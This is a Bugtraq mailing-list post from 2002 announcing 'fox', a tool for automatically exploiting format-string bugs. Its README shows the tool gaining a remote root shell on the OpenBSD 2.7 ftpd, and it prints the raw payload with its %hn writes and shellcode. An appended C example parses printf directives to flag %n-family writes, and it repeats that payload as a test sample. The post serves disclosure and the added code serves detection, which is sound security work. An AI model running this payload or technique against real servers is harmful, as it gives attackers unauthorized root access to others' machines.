Re: Howto exploit a remote format bug automatically

From: Fredrik Widlund (fredrik.widlund@defcom.com)
Date: 04/19/02


From: Fredrik Widlund <fredrik.widlund@defcom.com>
To: bugtraq@securityfocus.com
Date: Fri, 19 Apr 2002 12:57:52 +0100


Hi

"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
locally and remotely. Runs on OpenBSD and is not ported to other platforms,
though it should be very straightforward.

The only requirement is that you get the actual printed string back to the
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
small shell program since the output occurs in the process listing.

Should work for exploiting bugs on most little-endian 32-bit machines like the
i386, providing you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.

Regards,
Fredrik Widlund

-x-

README for example 2:
Exploiting OpenBSD 2.7 ftp server

Input has to be < 256 characters, working offsets are -18 and -2
Ex:

root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
alignment 0
chars before argument 111
chars before insert 0
argument offset 9
argument pointer offset 0
argument address 0xdfbfd15c
esp 0xdfbfd138

uid=0(root) gid=0(wheel) groups=0(wheel)
root@wolf> nc 127.0.0.1 21
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD wolf 2.7 GENERIC#0 i386
cat /etc/hosts
127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿
<81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K
<83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª
<81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx
exit
root@wolf>
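The hosts-file dump above shows the shape of the payload fox emits: a run of `%p` directives to walk up the stack, padded `%x` conversions to set the byte count, and `%hn` writes to deposit that count into memory. From the defender's side, the `%n` family is the one indicator worth alerting on in data that should never reach a format argument. The C below is an added example, not fox's code nor ftpd's: it parses printf-style directives the way a printf implementation would (positional `%N$`, flags, width, precision, length modifiers), counts `%n`-family writes, shows the hardened logging call (`"%s"` as the format, untrusted text as the argument), and runs over a few constructed FTP command lines, one of which is the directive run from the page. Function names and the sample lines are my own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Tally of printf-style directives found in one untrusted string. */
struct fmt_scan {
    int conversions;  /* conversion specifications, "%%" excluded */
    int writes;       /* %n-family directives: the memory-write primitive */
    int positional;   /* "%N$" positional argument references */
};

/* Walk the string the way a printf implementation would, counting directives.
   Grammar handled: %[N$][flags][width][.precision][length]conversion. */
struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = {0, 0, 0};
    const char *p = s;

    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') { p++; continue; }   /* "%%" prints a literal percent */
        if (*p == '\0') break;

        const char *q = p;                   /* optional positional "N$" */
        while (isdigit((unsigned char)*q)) q++;
        if (q > p && *q == '$') { r.positional++; p = q + 1; }

        while (*p && strchr("-+ #0", *p)) p++;                 /* flags */
        while (isdigit((unsigned char)*p) || *p == '*') p++;   /* width */
        if (*p == '.') {                                        /* precision */
            p++;
            while (isdigit((unsigned char)*p) || *p == '*') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;                /* length modifiers */
        if (*p == '\0') break;

        r.conversions++;
        if (*p == 'n') r.writes++;
        p++;
    }
    return r;
}

/* Alerting policy (assumed here): any %n-family directive in data that must
   never become a format string is treated as an attack indicator. */
int looks_like_format_attack(const char *s)
{
    return scan_format(s).writes > 0;
}

/* Hardened logging: the untrusted text is an argument, never the format.
   The vulnerable pattern this replaces is  printf(untrusted);  (or the same
   with syslog), where every '%' in the input becomes a directive. */
void log_untrusted(FILE *out, const char *untrusted)
{
    fprintf(out, "%s\n", untrusted);
}

/* Constructed sample command lines (not captured traffic); the second one is
   the directive run visible in the hosts-file dump above. */
static const char *samples[] = {
    "USER anonymous",
    "USER %p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn",
    "USER 100%% legit",
    "USER %3$n",
};

/* Number of sample lines the policy flags. */
int count_flagged(void)
{
    int n = 0;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (looks_like_format_attack(samples[i])) n++;
    return n;
}

int main(void)
{
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct fmt_scan r = scan_format(samples[i]);
        printf("conv=%d writes=%d pos=%d %s  ", r.conversions, r.writes,
               r.positional, looks_like_format_attack(samples[i]) ? "ALERT" : "ok");
        log_untrusted(stdout, samples[i]);   /* safe even for the payload line */
    }
    return 0;
}
```

The scanner is deliberately a parser rather than a `strstr(s, "%n")` check: `%hn`, `%3$n` and `%08hhn` would all slip past a substring match, and the page's own payload uses the `%hn` form.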
